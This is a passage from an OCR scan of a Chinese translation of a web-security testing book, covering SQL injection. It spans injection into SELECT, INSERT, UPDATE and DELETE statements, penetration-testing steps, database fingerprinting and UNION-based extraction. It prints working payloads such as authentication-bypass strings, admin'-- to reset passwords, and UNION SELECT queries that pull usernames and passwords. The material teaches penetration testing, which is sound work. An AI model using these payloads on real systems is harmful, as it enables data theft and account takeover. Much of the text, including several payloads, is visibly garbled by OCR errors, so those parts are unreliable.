wiley' or 'a' = 'a 
将 生成 以 下 人 查询: 


SELECT author,title,year FROM books WHERE publisher = ‘Wiley' OR 
'a'='a' and published=1 


这 个 碍 询 完 全 有 效 ， 可 得 到 和 1=1 攻 击 相 同 的 结果 。 


很 明显 ， 前 面 的 示例 不 会 造成 严重 的 安全 威胁 ， 因 为 用 户 使 用 完全 
合法 的 方法 就 可 以 访问 全 部 书籍 信息 。 但 是 ， 稍 后 我 们 将 描述 如 何 利用 
这 种 SQL 注入 漏洞 从 各 种 数据 库 表 中 提取 任何 数据 ， 并 提升 在 数据 库 和 
数据 库 服务 器 中 的 权限 。 为 此 ， 不 管 出 现在 哪个 应 用 程序 功能 中 ， 任 何 
SQL 注 入 漏洞 都 应 修 视 为 极其 严重 的 威胁 。 














SQL 语言 中 包含 许多 可 能 出 现在 语句 开头 的 动词 。 由 于 SELECT 是 
最 第 用 的 动词 ， 因 此 绝 大 多 数 的 SQL 注入 漏洞 出 现在 这 种 语句 中 。 的 
确 ， 当 讨论 SQL 注入 时 ， 因 为 所 举 的 示例 全 部 属于 这 种 类 型 ， 所 以 我 们 
常常 会 产生 这 样 的 印象 ， 即 SQL 注入 漏洞 只 出 现在 SELECT 语句 中 。 然 
而 ， 任 何 类 型 的 语句 都 可 能 存在 SQL 缺陷 ， 必 须 了 解 一 些 与 其 有 关 的 重 
要 问题 。 

当然 ， 当 与 一 个 远程 应 用 程序 交互 时 ， 通 常情 况 下 不 可 能 提前 知道 
用 户 输入 的 一 个 特殊 数据 项 将 由 哪 种 类 型 的 语句 处 理 。 但 是 ， 可 以 根据 
ee 

法 。 
1. SELECT 语句 

SELECT 语句 被 用 于 从 数据 库 中 获取 人 信息。 它们 营 用 于 应 用 程序 响 
应 用 户 操作 而 返回 信息 的 功能 中 ， 如 浏览 一 个 产品 目录 、 查 看 一 名 用 户 
的 资料 或 者 进行 一 项 搜索 。 根 据 数据 库 中 的 数据 核对 用 户 提 交 的 信息 的 
登录 功能 也 经 常 使 用 这 种 语句 。 

如 在 前 面 的 示例 中 说 明 的 ，SQL 注 入 攻击 的 进入 点 (entry point) 
通常 是 查询 中 的 WHERE 子 句 ， 它 将 用 户 提 交 的 数据 传送 给 数据 库 ， 以 
控制 查询 结果 的 范围 。 因 为 WHERE 子 句 一 般 在 SELECT 语句 的 最 后 ， 
攻击 者 就 可 以 使 用 注释 符号 将 查询 截 短 到 其 输入 的 结束 位 置 ， 而 不 会 使 
整个 查询 的 语法 失效 。 

SQL 注入 漏洞 偶尔 也 会 影响 SELECT 查询 的 其 他 部 分 ， 如 ORDER 

















BY 子 句 或 表 和 列 名 称 。 


Al, yn vw) 
笑 试 访问 
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2.INSERT 语 句 
INSERT 语 句 用 于 在 表 中 建立 一 个 新 的 数据 行 。 应 用 程序 通常 使 用 
ae 吾 句 添加 一 条 新 的 审计 日 志 、 创 建 一 个 新 用 户 账户 或 生成 一 个 新 订 


例如 ， 如 果 一 个 应 用 程序 允许 用 户 自我 注册 ， 指 定 他 们 自己 的 用 户 
名 和 密码 ， 就 可 以 使 用 下 面 的 语句 将 用 户 资 料 插 入 users 表 中 。 





INSERT INT asers password, ID, privs) VALUES ['daf', 
‘secret', 2248, 1} 


Tian eet sani 存在 SQL 注入 漏洞 ， 那 么 攻击 者 就 可 
以 在 表 中 插入 任何 数据 ， 包 括 他 上 自己 的 ID 和 privs 值 。 然 而 ， 要 想 这 样 
做 ， 攻 击 者 就 必须 确保 VALUES 子 句 的 其 他 部 分 正常 运行 。 特 别 是 其 中 
数据 项 的 个 数 与 类 型 必须 正确 。 例 如 ， 当 注入 username 字 段 时 ， 攻 击 者 
可 以 提交 以 下 输入 : 


roo", “bas, 9999; Vj- 


它 将 建立 一 个 ID 为 9999，Pprivs 为 0 的 账户 。 假 如 privs 字 段 用 来 决定 账户 
权限 ， 那 么 攻击 者 就 可 以 利用 它 创 建 一 个 管理 用 户 。 

有 时 ， 攻 击 者 完全 盲目 地 注入 一 个 INSERT 语 名 也 能 够 从 应 用 程序 
中 提取 出 字符 串 数据 。 例 如 ， 攻 击 者 可 以 拦截 数据 库 的 版 本 字符 串 ， 并 
把 它 插 入 自己 用 户 资料 的 一 个 字段 中 ;， 正 常情 况 下 ， 浏 览 器 将 显示 数据 
库 的 版 本 信息 。 








W 提示 ” 当 设 法 注入 一 个 INSERT 语 句 时 ， 可 能 无 法 提前 知道 
要 提交 多 少 个 参数 或 参数 的 类 型 。 在 前 面 的 示例 中 ， 可 以 通过 在 
VALUES EE a 直到 应 用 程序 创建 了 确实 
想 要 的 用 户 账 户 ， 从 而 解决 上 述 问题 。 例 如 ， 当 注入 username 字 段 


时 ， 可 以 提交 以 下 输入 : 
hay 13 
Foo', 1, 1)-- 
Foo’. i. 23 Ths 
由 于 大 多 数 数 据 库 都 会 隐 式 地 将 一 个 整数 转换 为 一 个 字符 串 ， 
可 以 在 每 个 位 置 都 使 用 一 个 整数 。 在 这 个 示例 中 ， 不 管 其 他 字段 如 
何 ， 它 将 生成 一 个 用 户 名 为 foo、 密 码 为 1 的 账户 。 
如 果 发 现 使 用 值 1 仍 然 遭 到 拒绝 ， 可 以 尝试 使 用 值 2000， 许 多 
数据 库 也 会 隐 式 地 将 它 转 换 成 基于 数据 的 数据 类 型 。 
确定 注入 点 之 后 的 正确 字段 数 后 ， 在 MS-SQL 中 ， 测 试 员 可 以 
人 并 采用 本 章 后 面部 分 将 介绍 的 基于 推 岂 的 
Tia 
在 Oracle 中 ， 则 可 以 在 insert 查 询 内 发 布 subselect 查 询 。 使 用 本 
章 后 面部 分 将 介绍 的 基于 推 疡 的 技巧 ， 该 subselect 查 询 可 能 导致 主 
查询 成 功 或 失败 。 


ALL yn vw) 
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3. UPDATE 语 句 
UPDATE 语 句 用 于 修改 表 中 的 一 行 或 几 行 数据 。 它 们 经 常用 在 用 户 








E A 
量 


典型 UPDATE 语 句 的 运行 机 制 与 INSERT 语 句 类 似 ， 只 是 UPDATE 
语句 中 通常 包含 一 个 WHERE 子 句 ， 告 诉 数 据 库 更 新 表 中 哪些 行 的 数 
据 。 例 如 ， 当 用 户 修改 密码 时 ， 应 用 程序 可 能 会 执行 以 下 查询 : 


t 


实际 上 ， 这 个 查询 首先 核实 用 户 的 现 有 密码 是 否 正确 ， 如 果 密 码 无 
误 ， 束 用 新 的 值 更 新 它 。 如 果 这 项 功能 存在 SQL 注 入 漏洞 ， 那 么 攻击 者 
就 能 避 开 现 有 密码 检查 ， 通 过 输入 以 下 用 户 名 更 新 管理 员 的 密码 : 


admin'=-- 


= 

4 

> 注解 ”由 于 无 法 提前 知道 应 用 程序 将 根据 专门 设计 的 输入 
执行 什么 操作 ， 因 此 ， 在 一 个 远程 应 用 程序 中 探查 SQL 注入 漏洞 往 
往 非常 危险 。 特 别 注意 ， 修 改 UPDATE 语 句 中 的 WHERE 子 句 可 能 
会 使 一 个 重要 的 数据 库 表 发 生 彻底 的 改变 。 例 如 ， 如 果 上 面 的 攻击 
者 之 前 已 经 提交 了 以 下 用 户 名 : 


admin' or 1=1 


那么 应 用 程序 可 能 会 执行 以 下 查询 : 





它 会 重新 设置 每 一 名 用 户 的 密码 ! 
即使 所 攻击 的 应 用 程序 功能 〈 如 主 登录 功能 ) 并 不 会 更 新 任何 


现 有 数据 ， 滩 透 测试 员 也 应 当 留 意 这 种 风险 。 有 时 候 ， 在 用 户 成 功 
登录 后 ， 应 用 程序 会 使 用 用 户 提交 的 用 户 名 执行 各 种 UPDATE 查 

询 ， 这 意味 着 任何 针对 WHERE 子 句 的 攻击 可 能 会 "复制 "到 其 他 语 
名 中， 给 所 有 应 用 程序 用 户 的 资料 造成 严重 破坏 。 在 尝试 探查 或 利 
用 任何 SQL 注入 漏洞 之 前 ， 必 须 确保 应 用 程序 所 有 者 接受 这 些 无 法 
放免 的 风险 ， 同时， 应 该 强 多 建议 他 们 在 开始 测试 前 对 数据 库 进 和 
完整 备份 





AL yn.) 
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4. DELETE 语 句 

DELETE 语 句 用 于 删除 表 中 的 一 行 或 几 行 数据 ， 例 如 用 户 从 他 们 的 
购物 篮 中 删除 一 件 商 品 或 从 个 人 资料 中 删除 一 个 交 货 地 址 。 

与 UPDATE 语 名 一样，DELETE 语 句 通常 使 用 WHERE 子 名 告诉 数 
据 库 更 新 表 中 哪些 行 的 数据 ， 并 很 可 能 在 这 个 子 句 中 并 入 用 户 提交 的 数 
据 。 破 坏 正 常 运行 的 WHERE 子 句 可 能 会 造成 严重 的 后 果 ， 我 们 在 
UPDATE 语句 部 分 提出 的 警告 同样 适用 于 这 种 攻击 。 








在 最 明显 的 情形 中 ， 只 需 同 应 用 程序 提交 一 个 意外 输入 ， 就 可 以 及 
现 并 最 终 确定 一 个 SQL 注 入 漏洞 。 在 其 他 情况 下 ， 这 种 缺陷 可 能 非常 微 
妙 ， 很 难 与 其 他 类 型 的 漏洞 或 不 会 造成 安全 威胁 的 “ 民 性 ?异常 区 分 开 
来 。 但 是 ， 可 以 按 顺 序 采 取 各 种 步骤 准确 查 明 绝 大 多 数 的 SQL 注入 漏 
洞 。 


ey 








=> 注解 在 应 用 程序 解析 过 程 中 《请 参阅 第 4 章 ) ， 应 该 已 经 
确定 了 应 用 程序 访问 后 端 数 据 库 的 各 种 情形 ; 现在 ， 应 当 在 所 有 这 
些 情 形 中 探查 SQL 注入 漏洞 。 实 际 上 ， 提 交 给 服务 器 的 任何 数据 都 
能 够 以 用 户 无 法 察觉 的 方式 传送 给 数据 库 函 数 ， 并 且 可 能 得 到 不 安 
全 的 处 理 。 因 此 ， 需 要 检查 所 有 这 些 数据 ， 以 查找 SQL 注入 漏洞 。 
这 包括 所 有 URL 人 参数、cookie、POST 数 据 项 以 及 HTTP 消 息 头 。 无 
相关 参数 名 称 与 参数 值 的 处 理 过 程 都 可 能 存在 漏 
洞 。 











YY 提示 EREASQLEA IRM, E RMR a LE AT 
可 以 提交 专门 设计 的 输入 的 多 阶段 过 程 。 应 用 程序 通常 会 从 几 个 请 
求 中 收集 一 组 数据 ， 一 旦 收集 到 全 部 的 数据 ， 就 将 其 保存 在 数据 库 
中 。 这 时 ， 如 果 仅 在 每 个 请 求 中 提交 专门 设计 的 数据 并 监控 应 用 程 
序 对 那个 请 求 的 啊 应 ， 就 会 遗漏 许多 SQL 注 入 漏洞 。 


1. HEATH BG 
如 果 SQL 碍 询 合并 用 户 提交 的 数据 ， 它 会 将 这 些 数据 包含 在 单 引 号 
中 。 为 利用 任何 SQL 注入 漏洞 ， 攻 击 者 需要 摆脱 这 些 引 号 的 束缚 。 








渗透 测试 步 又 


(1) 提交 一 个 单 引 号 作为 目标 碍 询 的 数据 。 观 察 是 否 会 造成 
错误 ， 或 结果 是 否 与 原始 结果 不 同 。 如 果 收 到 详细 的 错误 消息 ， 可 
查阅 9.2.13 节 了 解 该 消息 的 含义 。 

(2) 如 果 发 现 错误 或 其 他 噶 常 行为 ， 同 时 提交 两 个 单 引 号 ， 
看 会 出 现 什 么 情况 。 数 据 库 使 用 两 个 单 引号 作为 转 义 序列 ， 表 示 一 
个 原 义 单 引 号 literal single quote) ， 因 此 这 个 序列 被 解释 成 引用 
字符 串 中 的 数据 ， 而 不 是 结束 字符 串 的 终止 符 。 如 果 这 个 输入 导致 
错误 或 异种 行为 消失 ， 则 应 用 程序 可 能 易于 受 SQL 注 入 攻击 。 

(3) 为 进一步 核实 漏洞 是 否 存 在 ， 可 以 使 用 SQL 连接 符 建 立 
一 个 等 同 于 “良性 ”输入 的 字符 串 。 如 果 应 用 程序 以 与 处 理 对 应 “ 良 
性 ?输入 相同 的 方式 处 理 专门 设计 的 输入 ， 那 么 它 很 可 能 易于 受到 
攻击 。 每 种 数据 库 使 用 的 字符 连接 方法 各 不 相同 。 在 易 受 攻击 的 应 
用 程序 中 ， 可 以 注入 以 下 实例 构建 等 同 于 FOO 的 输入 : 

口 Oracle ‘| FOO 

口 MS-SQL: ‘+’FOO 

O MySQL: FOO [注意 两 个 引号 之 间 有 一 个 空格 ] 

















YY ”提示 可 以 通过 在 特定 的 参数 中 提交 SQL 通配符 % 来 确定 
应 用 程序 是 否 正 与 后 端 数据 库 交 互 。 例 如 ， 在 搜索 字段 中 提交 这 个 
通配符 通 单 会 返回 大 量 结果 ， 表 明 输 入 正 补 传送 到 SQL 查询 中 。 当 
然 ， 这 不 一 定 表示 应 用 程序 易 受 攻击 一 一 只 是 应 该 深入 探查 以 确定 
古人 否 存在 任何 具体 的 漏洞 。 

















YY ”提示 使 用 单 引号 查找 SQL 注入 漏洞 时 ， 应 特别 注意 浏览 
器 处 理 返回 的 页 面 时 发 生 的 任何 JavaScript 错 误 。 应 用 程序 经 常 在 


JavaScript 中 返回 用 户 提交 的 输入 ， 原 义 单 引 号 将 导致 JavaScript 解 
释 器 中 出 现 错误 。 如 第 12 章 所 述 ， 在 啊 应 中 注入 任意 JavaScript 将 导 
致 路 站 点 脚本 攻击 。 


2. 注入 数字 数据 

如 琳 SQL 但 询 合 并 用 户 提 交 的 数字 数据 ， 应 用 程序 仍然 会 将 它 包 含 
在 单 引号 之 中 ， 作 为 字符 串 数 据 进行 处 理 。 因 此 ， 一 定 要 执行 前 面 描述 
的 针对 字符 串 数 据 的 渗透 测试 步 又。 但是， 许多 时 候 ， 应 用 程序 会 将 数 
字数 据 以 数字 格式 直接 传送 到 数据 库 中 ， 并 不 把 它 放 入 单 引 号 中 。 如 果 
前 面 描述 的 测试 方法 无 法 检测 到 漏洞 ， 还 可 以 采取 以 下 针对 数字 数据 的 
特殊 测试 步 又 。 





渗透 测试 步 又 


(1) 尝试 输入 一 个 结果 等 于 原始 数字 值 的 简单 数学 表达 式 。 
例如 ， 如 果 原 始 值 为 >， 尝试 提交 1+1 或 3-1。 如 果 应 用 程序 做 出 相 
同 的 啊 应 ， 则 表示 它 易于 受到 攻击 。 

(2) 如 果 证 实 被 修改 的 数据 会 对 应 用 程序 的 行为 造成 明显 影 
啊 ， 则 前 面 描述 的 测试 方法 最 为 可 靠 。 例 如 ， 如 果 应 用 程序 使 用 数 
字 化 PageID 参 数 指定 应 返回 什么 内 容 ， 则 用 1+1 代 替 2 得 到 相同 的 结 
果 明 显 表 示 存 在 SQL 注入 。 但 是 ， 如 果 能 够 在 数字 化 参数 中 插入 任 
意 输入 ， 但 应 用 程序 的 行为 却 没 有 发 生 改 变 ， 那 么 前 面 的 检测 方法 
就 无 法 发 现 漏洞 。 

(3) 如 果 第 一 个 测试 方法 取得 成 功 ， 你 可 以 利用 更 加 复杂 
的 、 使 用 特殊 SQL 关键 字 和 语法 的 表达 式 进一步 获得 与 漏洞 有 关 的 
证 据 。ASCII 命 令 就 是 一 个 典型 的 示例 ， 它 返回 被 提交 字符 的 数字 
和 以 下 表达 
式 等 于 2. 














OJ -ASCII A") 

(4) 如果 单 引 号 被 过 滤 掉 ， 那 么 前 面 的 测试 方法 就 没有 作 
用 。 但 是 ， 这 时 可 以 利用 这 样 一 个 事实 : 即 在 必要 时 ， 数 据 库 会 隐 
含 地 将 数字 数据 转化 为 字符 串 数 据 。 例 如 ， 因 为 字符 1 的 ASCII 值 
为 49， 在 SQL 中 ， 以 下 表达 式 等 于 2。 


51-ASCII (1) 





V 提示 “在 探查 应 用 程序 是 否 存在 SQL 注入 之 类 的 缺陷 时 ， 
我 们 常常 会 犯 一 个 错误 ， 即 忘记 某 些 字符 在 HTTP 请 求 中 具有 特殊 
含义 。 如 果 你 希望 在 攻击 有 效 载 荷 中 插入 这 些 字符 ， 必 须 谨 慎 地 对 
它们 进行 URL 编 得 ， 确 保 应 用 程序 按 预 的 方式 解释 它们 ， 特 别 是 
以 下 字符 。 




















口 & 和 = 用 于 连接 名 / 值 对 ， 建 立 查询 字符 串 和 POST 数据 块 。 应 
别 使 用 %26 与 %3d 对 它们 进行 编码 。 
口 查询 字符 串 中 不 允许 使 用 空格 ， 如 果 在 其 中 提交 空格 ， 整 个 
字符 串 会 立即 终止 。 必 须 使 用 + 或 %20 对 其 编码 。 
口 由 于 + 用 于 编码 空格 ， 如 果 想 在 字符 串 中 使 用 +， 必 须 使 
用 %2b 对 其 编码 。 因 此 ， 在 前 面 的 数字 化 示例 中 ，1+1 应 以 1%2b1 
的 形式 提交 。 

口 分 号 用 于 分 隔 cookie 字 7 段 ， 必 须 使 用 %3b 对 其 编码 。 

无 论 是 通过 拦截 代理 服务 器 直接 从 浏览 器 中 编辑 参数 值 ， 或 是 
使 用 其 他 方法 进行 编辑 ， 都 必须 使 用 这 些 编码 方法 。 如 果 没 有 对 相 
关 字 符 进 行 编码 ， 那 么 整个 请 求 可 能 会 无 效 ， 或 提交 预期 之 外 的 数 


LK 
> 





一 般 来 说 ， 前 面 描述 的 步骤 足以 确定 绝 大 多 数 的 SQL 注入 漏洞 ， 包 


括 许 多 回 浏 览 器 返回 无 用 结果 或 错误 信息 的 漏洞 。 但 是 ， 在 东 些 情况 


下 ， 
在 。 





可 能 有 必要 使 用 更 加 高 级 的 技巧 ， 如 时 间 延 迟 ， 来 确定 漏洞 是 人 否 存 
我 们 将 在 本 章 后 面部 分 描述 这 些 技巧 。 


3. 注入 碍 询 结构 


中 ， 


如 果 用 户 提交 的 数据 被 插入 SQL 查询 结构 ， 而 不 是 查询 中 的 数据 项 
这 时 实施 SQL 注入 攻击 只 需要 直接 应 用 有 效 的 SQL 语法 ， 而 不 再 要 





HEAT FEA “FEL”. 








SQL 查询 结构 中 最 常见 的 注入 点 是 ORDER BY £4). ORDER BY 





键 字 接 受 菏 个 列 名 称 或 编号 ， 并 根据 该 列 中 的 值 对 结果 集 进行 排序 。 用 
户 经 常 使 用 这 种 功能 对 浏览 器 中 的 表 进 行 排序 。 


由 


例如 ， 使 用 以 下 碍 询 可 以 检索 一 个 可 排序 的 图 书 表 : 
SELECT author, title, year FROM bocks WHERE publisher = ‘wiley’ ORDER BY 


title ASC 


如 果 ORDER BY 中 的 列 名 称 tite 由 用 户 指定 ， 束 没有 必要 使 用 单 引 








， 因 为 用 户 提交 的 数据 已 经 直接 修改 了 SQL 碍 询 的 结构 。 


VY 提示 在 极 少数 情况 下 ， 用 户 提交 的 输入 可 能 会 指定 
WHERE 子 句 中 的 列 名 称 。 由 于 这 些 输入 也 没有 包含 在 单 引 号 中 ， 
因此 会 导致 与 前 面 介绍 的 漏洞 类 似 的 问题 。 笔 者 也 曾 过 到 一 些 以 用 
户 提交 的 参数 作为 表 名 称 的 应 用 程序 。 最 终 ， 有 大 量 应 用 程序 允许 
用 户 指定 排序 关键 字 (ASC 或 DESC) ， 可 能 认为 这 并 不 会 导致 


SQL 注入 攻击 。 


在 列 名 称 中 碍 找 SQL 注 入 漏洞 可 能 会 相当 困难 。 如 果 提 交 一 个 并 非 
有 效 列 名 称 的 值 ， 查 询 将 导致 错误 。 这 意味 着 ， 无 论 攻击 者 提交 路 径 遍 
历 字符 串 、 单 引号 、 双 引号 或 任何 其 他 任意 字符 捉 ， 应 用 程序 都 会 返回 
相同 的 啊 应 。 因 此 ， 采 用 第 用 的 目 动 模糊 测试 和 手动 测试 技巧 往往 会 遗 
汤 某 些 漏洞 。 如 果 提 交 用 于 探 但 各 种 漏洞 的 标准 测试 字符 串 全 部 导致 相 
同 的 啊 应 ， 这 本 里 并 不 表示 出 现任 何 错误 。 











We 

S 

> 注解 本 章 后 面部 分 介绍 的 一 些 传 统 的 SQL 注入 防御 措施 
并 不 能 防范 用 户 提交 的 列 名 称 。 使 用 预 处 理 的 语句 或 转 义 单 引 号 也 
Cee 因此 ， 现 代 应 用 程序 应 尤其 小 心 这 类 攻 


渗透 测试 步 又 


(1) 记 下 任何 可 能 控制 应 用 程序 返回 的 结果 的 顺序 或 其 中 的 
字段 类 型 的 参数 。 

(2) 提供 一 系列 在 参数 值 中 提交 数字 值 的 请 求 ， 从 数字 1 开 
始 ， 然 后 逐个 请 求 递增 。 

口 如 果 更 改 输入 中 的 数字 会 影响 结果 的 顺序 ， 则 说 明 输 入 可 能 
被 插入 到 ORDER BY 子 句 中 。 在 SQL 中 ，ORDER BY 1 将 依据 第 一 
个 列 进行 排序 。 然 后 ， 将 这 个 数字 增加 到 2 将 更 改 数据 的 显示 顺 
序 ， 以 依据 第 二 个 列 进行 排序 。 如 果 提 交 的 数字 大 于 结果 集中 的 列 
数 ， 查 询 将 会 失败 。 在 这 种 情况 下 ， 你 可 以 通过 使 用 以 下 字符 串 ， 
检查 是 否 可 以 颠倒 结果 的 顺序 ， 从 而 确认 是 否 可 以 注入 其 他 SQL: 


LAs == 


i Desc = 


口 如 果 提 区 数字 1 生成 一 组 结 末 ， 其 中 一 个 列 的 每 一 行 都 包含 
一 个 1， 则 说 明 输 入 可 能 被 插入 到 查询 返回 的 列 的 名 称 中 。 例 如 : 


SELECT 1,title,year FROM books WHERE publisher='Wiley' 





wa 
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=> 注解 在 ORDER BY 子 句 中 实施 SQL 注入 与 其 他 注入 情形 
有 很 大 区 别 。 此 时 ， 数 据 库 不 会 接受 查询 中 的 UNION、WHERE、 
OR 或 AND 关 键 字 。 通 常 ， 实 施 注 入 攻击 需要 攻击 者 指定 一 个 髓 套 
查询 来 替代 参数 ， 如 用 (select 1 where <<condition>> or 1/0=0) 替 
代 列 名 称 ， 并 利用 本 章 后 面部 分 介绍 的 推断 技巧 。 对 于 支持 批量 查 
询 的 数据 库 〈 如 MS-SQL) ， 这 可 能 是 最 有 效 的 注入 攻击 方法 。 





9.2.4 “指纹 ”识别 类 


运 今 为 止 ， 我 们 所 描述 的 大 多 数 技巧 能 够 同 常用 的 数据 库 平台 发 动 
有 效 攻 击 ， 任 何 差别 都 已 通过 对 语法 进行 细微 调整 得 到 解雇 。 但 是 ， 随 
着 我 们 开始 分 析 更 高 级 的 利用 技巧 ， 各 种 平台 之 间 的 差异 变 得 更 加 明 
显 ， 因 此 了 解 所 针对 的 是 何 种 类 型 的 后 端 数据 库 就 变 得 盒 发 重要 。 

我 们 已 经 知道 如 何 提 取 和 常见 数据 库 的 版 本 字符 串 。 即 使 由 于 某 种 原 
因 无 法 提取 到 版 本 信息 ， 我 们 还 是 可 以 使 用 其 他 方法 识别 数据 库 。 一 种 
最 可 靠 的 方法 是 根据 数据 库 连 接 字 符 串 的 不 同方 式 进行 识别 。 在 控制 某 
个 字符 串 数据 项 的 查询 中 ， 可 以 在 一 个 请 求 中 提交 一 个 特殊 的 值 ， 然 后 
测试 各 种 连接 方法 ， 以 生成 那个 字符 串 。 如 果 得 到 相同 的 结果 ， 束 可 以 
确定 所 使 用 的 数据 库 类 型 。 下 面 的 示例 说 明 常 用 的 数据 库 如 何 构 建 
services 44 AB - 

D Oracle: ‘serv’ ||‘ices’ 

UMS-SQL: ‘serv’+‘ices’ 

O MySQL: ‘serv’ ‘ices’ [注意 中 间 有 空格 ] 

如 果 注 入 数字 数据 ， 则 可 以 使 用 下 面 的 攻击 字符 串 来 识别 数据 库 。 
每 个 数据 项 在 目标 数据 库 中 的 求 值 结果 为 0， 在 其 他 数据 库 中 则 会 导致 
HR o 

J Oracle: BITAND(1,1)-BITAND(1,1) 

a MS-SQL: PACK RECEIVED-PACK RECEIVED 

J MySQL: CONNECTION_ID()-CONNECTION_ID() 











— 
SA 

=> TERR MS-SQL 和 Sybase 数据 库 起 源 相 同 ， 因 此 它们 在 表 结 
构 、 全 局 变量 和 存储 过 程 方面 存在 许多 相似 之 处 。 实 际 上 ， 后 文 描 
述 的 绝 大 多 数 针 对 MS-SQL 的 攻击 技巧 同样 也 适用 于 Sybase。 


在 识别 数据 库 时 ，MySQL 如 何 处 理 某 些 行内 注释 (inline 
comment) 也 是 一 个 值得 关注 的 问题 。 如 果 一 个 注释 以 感叹 号 开头 ， 接 
着 是 数据 库 版 本 字符 串 ， 那 么 只 要 数据 库 的 实际 版 本 等 于 或 高 于 那个 字 
符 串 ， 应 用 程序 就 会 将 注释 内 容 解 释 为 SQL; 否则 ， 应 用 程序 就 会 忽略 
注释 内 容 ， 将 它 作 为 注释 处 理 。 与 C 中 的 预 处 理 指令 类 似 ， 程 序 员 也 可 
以 对 这 一 点 加 以 利用 ， 编 写 出 根据 所 使 用 的 数据 库 版 本 进行 处 理 的 不 同 
代码 。 攻 击 者 还 可 以 利用 它 来 识别 数据 库 的 实际 版 本 。 例 如 ， 如 果 使 用 
的 MySQL 版 本 高 于 或 等 于 3.23.02， 注 入 下 面 的 字符 串 将 使 SELECT 语 人 句 




















的 WHERE 子 句 为 假 : 


F*"T32302 and d=0*7 


9.2.5 UNION 操作 符 


SQL 使 用 UNION 操 作 符 将 两 个 或 几 个 SELECT 语句 的 结果 组 合 到 独 
芯 一 个 结果 中 。 如 果 一 个 Web 应 用 程序 的 SELECT 语句 存在 SQL 注入 漏 
洞 ， 通 常 可 以 使 用 UNION 操 作 符 执行 另 一 次 完全 独立 的 查询 ， 并 将 它 
的 结果 与 第 一 次 查询 的 结果 组 合 在 一 起 。 如 果 应 用 程序 向 浏览 器 返回 查 
询 结果 ， 那 么 就 可 以 使 用 这 种 技巧 从 应 用 程序 中 提取 任意 的 数据 。 所 有 
的 主流 DBMS 产 品 者 支持 UNION， 对 于 直接 返回 查询 结果 的 情况 ， 
UNION 是 检索 信息 最 快捷 的 方式 。 

我 们 再 回 到 那个 允许 用 户 根 据 作 者 、 书 名 、 出 版 商 和 其 他 条 件 搜索 
书籍 的 应 用 程序 。 搜 索 由 Wiley 出 版 的 书籍 将 引起 应 用 程序 执行 以 下 查 


询 : 














SELECT author,title,year FROM books WHERE publisher = 'Wiley' 


假设 这 个 查询 返回 下 和 面 这 组 结果 : 


作 者 书 名 出 版 年 份 
Litchfield The Database Hacker's Handbook 2005 
Anley The Shellcoder's Handbook 2007 


前 文 已 经 介绍 了 攻击 者 是 如 何 问 搜索 功能 提交 专门 设计 的 输入 、 破 
坏 查 询 中 的 WHERE 子 句 、 返 回 数据 库 中 保存 的 所 有 书籍 的 。 一 个 更 有 
趣 的 攻击 是 使 用 UNION 操 作 符 注入 另外 一 个 SELECT 查询 ， 并 将 查询 结 
果 附 加 在 第 一 次 查询 的 结果 之 后 。 第 二 次 查询 能 够 从 另 一 个 完全 不 同 的 
数据 库 表 中 提取 数据 。 例 如 ， 输 入 以 下 搜索 项 : 


Wiley' UNION SELECT username,password,uid FROM users-- 


应 用 程序 将 执行 以 下 查询 : 


TWTT 


SELECT author,title,year FROM books WHERE publisher = 'Wiley' 
UNION SELECT username, password, vid FROM users -- 


这 个 查询 返 问 最 初 的 搜索 名 mR, 接着 是 用 户 表 的 内 容 ， 





作 A 书 名 出 版 年 份 
Litchfield The Database Hacker's Handbook 2005 
Anley The Shellcoder's Handbook 2007 
admin rOOtrOx 0 
cliff Reboot 1 


=> 注解 ”如 果 使 用 UNION 操 作 符 组 合 两 个 或 几 个 SELECT 查 
询 的 结果 ， 那 么 组 合 结果 的 列 名 称 与 第 一 个 SELECT 查 询 的 列 名 称 
完全 相同 。 如 前 面 的 表格 所 示 ， 用 户 名 出 现在 author 列 中 ， 密 码 出 
现在 title 列 中 。 这 表示 应 用 程序 在 处 理 被 修改 的 查询 结果 时 ， 它 无 
法 检测 出 返回 的 数据 实际 上 来 自 一 个 完全 不 同 的 表 。 


这 个 简单 的 示例 说 明 ，UNION 操 作 符 可 在 SQL 注入 攻击 中 发 挥 非常 
巨大 的 作用 。 但 是 ， 在 利用 它 发 动 攻击 之 前 ， 攻 击 者 有 必要 了 解 它 的 两 
个 重要 限制 。 

口 如 果 使 用 UNION 操 作 符 组 合 两 个 查询 的 结果 ， 这 两 个 结果 必须 结 
构 相 同 。 也 就 是 说 ， 它 们 的 列 数 必须 相同 ， 必 须 使 用 按 相同 顺序 出 现 的 
相同 或 兼容 的 数据 类 型 。 

口 为 注入 另 一 个 返回 有 用 经 才 果 的 查询 ， 攻击 者 必须 知道 他 所 针对 的 
数据 库 表 的 名 称 以 及 有 关 列 的 名 称 

现在 让 我 们 更 加 深入 地 分 析 前 一 个 限制 。 假设 攻击 者 试图 注入 另 一 
个 返回 错误 列 数 的 查询 。 他 提交 以 下 输入 : 


Wiley' UNION SELECT username,password FROM users 


最 初 的 查询 返回 3 列 ， 而 注入 的 查询 返回 2 列 。 因 此 ， 数 据 库 返 回 以 
下 错误 : 


ORA-01789: query block has incorrect number of result columns 


假设 攻击 者 试图 注入 另 一 个 列 内 数据 类 型 不 兼容 的 查询 。 他 提交 以 





下 输入 : 


Wiley' UNION SELECT uid,username,password FROM users-- 


这 样 ， 数 据 库 将 尝试 把 第 二 个 查询 的 密码 列 〈( 其 中 为 字符 串 数据 ) 
与 第 一 个 得 询 的 年 代 列 《其 中 为 数字 数据 ) 组 合 起 来 。 因 为 字符 串 数据 
e 这 个 语句 造成 一 个 错误 : 


A-01790: expression have same datatype as corresponding expression 


SA 
=> 注解 E Thije Oraclei NIN fa DOVE Js 息 。 其 其 他 数据 库 返 回 的 
相应 错误 消息 请 参阅 9.2.13 节 。 


在 许多 现实 例子 中 ， 数 据 库 返回 的 错误 消息 将 被 应 用 程序 截获 ， 并 
不 显示 在 用 户 的 浏览 器 上 。 因 此， 如 果 想 要 查 明 第 一 个 查询 的 结构 ， 也 
许 只 能 纯粹 靠 猜测 。 但 是 ， 事 实 并 非 如 此 。 可 以 利用 以 下 三 点 帮助 简化 
这 项 任务 。 

口 为 使 注入 的 查询 能 够 与 第 一 个 查询 结合 ， 它 不 一 定 要 使 用 完全 相 
同 的 数据 类 型 。 但 是 ， 它 们 必须 相互 兼容 ， 也 就 是 说 ， 第 二 个 查询 中 的 
每 种 数据 类 型 要 么 必须 与 第 一 个 查询 中 的 对 应 类 型 完全 相同 ， 要 么 必须 
隐 含 地 转换 到 那个 类 型 。 数 据 库 会 将 一 个 数字 值 隐 含 地 转换 为 一 个 字符 
